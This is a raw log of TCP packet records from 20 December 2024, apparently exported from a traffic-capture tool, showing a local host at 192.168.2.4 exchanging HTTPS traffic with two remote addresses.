                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.279114962 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.279185057 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.282224894 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.282291889 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.288120985 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.288187981 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.293924093 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.293994904 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.299895048 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.299964905 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.303051949 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.303128958 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.308865070 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.308953047 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.311819077 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.311896086 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.318372965 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.318463087 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.390424967 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.390506029 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.393315077 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.393384933 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.395735979 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.395811081 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.400392056 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.400492907 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.411716938 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.411736965 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.411775112 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.411794901 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.411817074 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.411869049 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.427517891 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.427561045 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.427607059 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.427624941 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.427656889 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.441097975 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.441118002 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.441189051 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.441207886 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.450433016 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.450452089 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.450500011 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.450515032 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.450542927 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.457398891 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.457439899 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.457482100 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.457499981 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.457530022 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.457870007 CET44349740141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.457995892 CET44349740141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.458067894 CET49740443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.458101034 CET44349740141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.458129883 CET44349740141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.458255053 CET49740443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.458295107 CET44349740141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.459438086 CET44349740141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.459515095 CET49740443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.459532022 CET44349740141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.464766026 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.464807034 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.464842081 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.464857101 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.464900970 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.465357065 CET49749443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.465411901 CET44349749141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.465490103 CET49749443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.465919971 CET49749443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.465948105 CET44349749141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.467910051 CET44349740141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.468019009 CET49740443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.468034029 CET44349740141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.472101927 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.472145081 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.472177029 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.472193003 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.472225904 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.524077892 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.524091959 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.524111032 CET49740443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.570884943 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.577063084 CET44349740141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.586311102 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.586330891 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.586370945 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.586394072 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.586401939 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.586432934 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.586438894 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.586457014 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.586482048 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.593677998 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.593719959 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.593755960 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.593771935 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.593803883 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.593830109 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.593841076 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.600682974 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.600730896 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.600758076 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.600774050 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.600821018 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.606993914 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.607042074 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.607057095 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.607074976 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.607101917 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.607126951 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.614527941 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.614573956 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.614605904 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.614619970 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.614650965 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.617891073 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.617968082 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.618016005 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.618032932 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.618099928 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.618354082 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.618463993 CET44349741141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.618534088 CET49741443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.631670952 CET49740443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.631692886 CET44349740141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.649610996 CET44349740141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.649673939 CET49740443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.649689913 CET44349740141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.659352064 CET44349740141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.659415007 CET49740443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.659430981 CET44349740141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.666914940 CET44349740141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.666974068 CET49740443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.666986942 CET44349740141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.667078018 CET44349740141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.667135954 CET49740443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.668080091 CET49740443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.668102980 CET44349740141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.689245939 CET49750443192.168.2.489.35.237.170
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.689277887 CET4434975089.35.237.170192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.689351082 CET49750443192.168.2.489.35.237.170
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.689631939 CET49750443192.168.2.489.35.237.170
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.689659119 CET4434975089.35.237.170192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.341002941 CET44349743141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.341295004 CET49743443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.341326952 CET44349743141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.341861010 CET44349743141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.342549086 CET49743443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.342642069 CET44349743141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.342758894 CET49743443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.344856977 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.345089912 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.345145941 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.345619917 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.346302032 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.346302032 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.346338987 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.346410036 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.383373022 CET44349743141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.397814035 CET49743443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.397878885 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.690177917 CET44349749141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.690530062 CET49749443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.690606117 CET44349749141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.694147110 CET44349749141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.694351912 CET49749443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.694746971 CET49749443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.694922924 CET44349749141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.695044041 CET49749443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.739381075 CET44349749141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.740627050 CET49749443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.740648985 CET44349749141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.786813974 CET49749443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.790904999 CET44349743141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.790966988 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.790987015 CET44349743141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.791023016 CET44349743141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.791054010 CET44349743141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.791083097 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.791090012 CET44349743141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.791125059 CET44349743141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.791130066 CET49743443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.791130066 CET49743443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.791153908 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.791162014 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.791171074 CET44349743141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.791208029 CET49743443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.791228056 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.791378021 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.791467905 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.791508913 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.791531086 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.791672945 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.798741102 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.798877001 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.799099922 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.799154997 CET44349743141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.799258947 CET49743443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.799277067 CET44349743141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.807152033 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.807363033 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.807380915 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.807440996 CET44349743141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.807502985 CET44349743141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.807538986 CET49743443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.807607889 CET49743443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.807857037 CET49743443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.807887077 CET44349743141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.848737001 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.910291910 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.953516960 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.983027935 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.985383034 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.985500097 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.985521078 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.995485067 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.995599985 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:40.995611906 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.011291981 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.011384010 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.011418104 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.011431932 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.011502981 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.018990040 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.027412891 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.027483940 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.027517080 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.027529001 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.027631998 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.035873890 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.043922901 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.044092894 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.044142008 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.052356005 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.052737951 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.052800894 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.059609890 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.060028076 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.060091972 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.101722956 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.101784945 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.139729023 CET44349749141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.139838934 CET44349749141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.139933109 CET44349749141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.140017986 CET44349749141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.140068054 CET49749443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.140089989 CET44349749141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.140115976 CET44349749141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.140185118 CET49749443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.140661955 CET49749443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.140692949 CET44349749141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.148289919 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.154849052 CET44349749141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.154989004 CET49749443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.155047894 CET44349749141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.175440073 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.177532911 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.177660942 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.177931070 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.178014040 CET44349744141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.178210020 CET49744443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.184134960 CET44349744141.193.213.10192.168.2.4
